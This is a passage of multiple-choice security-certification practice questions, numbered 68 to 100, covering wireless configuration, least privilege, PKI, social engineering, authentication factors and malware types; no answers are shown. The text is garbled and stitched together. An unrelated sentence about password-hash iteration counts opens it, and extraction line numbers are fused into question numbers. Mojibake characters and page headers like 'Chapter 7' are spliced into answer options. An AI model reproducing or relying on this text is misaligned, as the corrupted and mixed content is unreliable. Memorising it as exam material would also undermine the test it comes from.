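Storing the iteration count inside each record is what lets the work factor be raised later without a migration: old records still verify, `needs_rehash` flags them, and they are rewritten at the next login when the plaintext is briefly available.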
728368. You installed a WAP for a local coffee shop and have discovered the signal is extending
7284into the parking lot. Which of the following configurations will best correct this issue?
7285A. Change the antenna type.
7286B. Disable the SSID broadcast.
7287C. Reduce the signal strength for indoor coverage only.
7288D. Enable MAC filtering to prevent devices from accessing the wireless network.
728969. You are a network administrator for a bank. A branch manager discovers that the desk-
7290side employees have the ability to delete lending policies found in a folder within the file
7291server. You review the permissions and notice the deskside employees have “modifyâ€
7292permissions to the folder. The employees should have read permissions only. Which of the
7293following security principles has been violated?
7294A. Job rotation
7295B. Time-of-day restrictions
7296C. Separation of duties
7297D. Least privilege
729870. Which of the following concepts of cryptography ensures integrity of data by the use of
7299digital signatures?
7300A. Key stretching
7301B. Steganography
7302C. Key exchange
7303D. Hashing
730471. Your manager has asked you to recommend a public key infrastructure component to
7305store certificates that are no longer valid. Which of the following is the best choice?
7306A. Intermediate CA
7307B. CSR
7308C. CRL
7309D. Key escrow
731072. You are a backup operator and receive a call from a user asking you to send sensitive docu-
7311ments immediately because their manager is going to a meeting with the company’s executives.
7312The user states the manager’s files are corrupted and he is attending the meeting in the next 5
7313minutes. Which of the following forms of social engineering best describes this situation?
7314A. Scarcity
7315B.
7316ConsensusChapter 7
7317C. Intimidation
7318D. Authority
7319â–
7320Practice Test
7321209
732273. Which of the following controls can you implement together to prevent data loss if a
7323mobile device is lost or stolen? (Choose two.)
7324A. Geofencing
7325B. Full-device encryption
7326C. Screen locks
7327D. Push notification services
732874. You are asked to find the MAC address on a Linux machine. Which of the following
7329commands can you use to discover it?
7330A. ipconfig
7331B. ifconfig
7332C. tracert
7333D. ping
733475. A chief security officer (CSO) notices that a large number of contractors work for the
7335company. When a contractor leaves the company, the provisioning team is not notified.
7336The CSO wants to ensure the contractors cannot access the network when they leave.
7337Which of the following polices best supports the CSO’s plan?
7338A. Account disablement
7339B. Account lockout policy
7340C. Enforce password history
7341D. Account expiration policy
734276. The CISO wants to strengthen the password policy by adding special characters to users’
7343passwords. Which of the following control best achieves this goal?
7344A. Password complexity
7345B. Password length
7346C. Password history
7347D. Group policy
734877. Which of the following deployment models allows a business to have more control of the
7349devices given to employees that handle company information?
7350A. DLP
7351B. COPE
7352C. BYOD
7353D. CYODChapter 7
7354210
7355â–
7356Practice Test
735778. A network administrator uses their fingerprint and enters a PIN to log onto a server.
7358Which of the following best describes this example?
7359A. Identification
7360B. Single authentication
7361C. Multifactor authentication
7362D. Transitive trust
736379. Your company wants to perform a privacy threshold assessment (PTA) to identify all PII
7364residing in its systems before retiring hardware. Which of the following would be exam-
7365ples of PII? (Choose two.)
7366A. Date of birth
7367B. Email address
7368C. Race
7369D. Fingerprint
737080. Your HIPS is incorrectly reporting legitimate network traffic as suspicious activity. What
7371is this best known as?
7372A. False positive
7373B. False negative
7374C. Credentialed
7375D. Noncredentialed
737681. Matt, a network administrator, is asking how to configure the switches and routers to
7377securely monitor their status. Which of the following protocols would he need to imple-
7378ment on the devices?
7379A. SSH
7380B. SNMP
7381C. SMTP
7382D. SNMPv3
738382. Your company has issued a hardware token-based authentication to administrators to
7384reduce the risk of password compromise. The tokens display a code that automatically
7385changes every 30 seconds. Which of the following best describes this authentication
7386mechanism?
7387A. TOTP
7388B. HOTP
7389C. Smartcard
7390D. Proximity cardChapter 7
7391â–
7392Practice Test
7393211
739483. You are the network administrator for your company’s Microsoft network. Your CISO is
7395planning the network security and wants a secure protocol that will authenticate all users
7396logging into the network. Which of the following authentication protocols would be the
7397best choice?
7398A. RADIUS
7399B. TACACS+
7400C. Kerberos
7401D. SAML
740284. Which of the following is not a vulnerability of end-of-life systems?
7403A. When systems can’t be updated, firewalls and antiviruses are not sufficient
7404protection.
7405B. Out-of-date systems can result in fines in regulated industries.
7406C. When an out-of-date system reaches the end-of-life, it will automatically shut down.
7407D. Operating out-of-date systems can result in poor performance and reliability and can
7408lead to denial of services.
740985. Which of the following statements are true regarding viruses and worms? (Choose two.)
7410A. A virus is a malware that self-replicates over the network.
7411B. A worm is a malware that self-replicates over the network.
7412C. A virus is a malware that replicates by attaching itself to a file.
7413D. A worm is a malware that replicates by attaching itself to a file.
741486. Which of the following wireless attacks would be used to impersonate another WAP to
7415obtain unauthorized information from nearby mobile users?
7416A. Rogue access point
7417B. Evil twin
7418C. Bluejacking
7419D. Bluesnarfing
87. Tony, a security administrator, discovered through an audit that all the company’s access
points are currently configured to use WPA with TKIP for encryption. Tony needs to
improve the encryption on the access points. Which of the following would be the best
option for Tony?
A. WPA2 with CCMP
B. WEP
C. WPA with CCMP
D. WPS
Chapter 7 ■ Practice Test 212
88. Your department manager assigns Tony, a network administrator, the job of expressing
the business and financial effects that a failed SQL server would cause if it was down for
4 hours. What type of analysis must Tony perform?
A. Security audit
B. Asset identification
C. Business impact analysis
D. Disaster recovery plan
89. You are the security administrator for a local hospital. The doctors want to prevent the
data from being altered while working on their mobile devices. Which of the following
would most likely accomplish the request?
A. Cloud storage
B. Wiping
C. SIEM
D. SCADA
90. You are a Unix engineer, and on October 29 you discovered that a former employee had
planted malicious code that would destroy 4,000 servers at your company. This malicious
code would have caused millions of dollars’ worth of damage and shut down your
company for at least a week. The malware was set to detonate at 9:00 a.m. on January 31.
What type of malware did you discover?
A. Logic bomb
B. RAT
C. Spyware
D. Ransomware
91. Which of the following is defined as hacking into a computer system for a politically or
socially motivated purpose?
A. Hacktivist
B. Insider
C. Script kiddie
D. Evil twin
92. A network administrator with your company has received phone calls from an individual
who is requesting information about their personal finances. Which of the following types
of attack is occurring?
A. Whaling
B. Phishing
C. Vishing
D. Spear phishing
93. Which of the following can be restricted on a mobile device to prevent security violations?
(Choose three.)
A. Third-party app stores
B. Biometrics
C. Content management
D. Rooting
E. Sideloading
94. Which of the following does a remote access VPN usually rely on? (Choose two.)
A. IPSec
B. DES
C. SSL
D. SFTP
95. Matt, a security administrator, wants to use a two-way trust model for the owner of a
certificate and the entity relying on the certificate. Which of the following is the best option
to use?
A. WPA
B. Object identifiers
C. PFX
D. PKI
96. If domain A trusts domain B, and domain B trusts domain C, then domain A trusts
domain C. Which concept does this describe?
A. Multifactor authentication
B. Federation
C. Single sign-on
D. Transitive trust
97. A user entered a username and password to log into the company’s network. Which of the
following best describes the username?
A. Authorization
B. Authentication
C. Identification
D. Accounting
98. Which of the following tools can be used to hide messages within a file?
A. Data sanitization
B. Steganography
C. Tracert
D. Network mapping
99. Which of the following is best used to prevent ARP poisoning on a local network?
(Choose two.)
A. Antivirus
B. Static ARP entries
C. Patching management
D. Port security
100. Which of the following is the best practice to place at the end of an ACL?
A. USB blocking
B. Time synchronization
C. MAC filtering
D. Implicit deny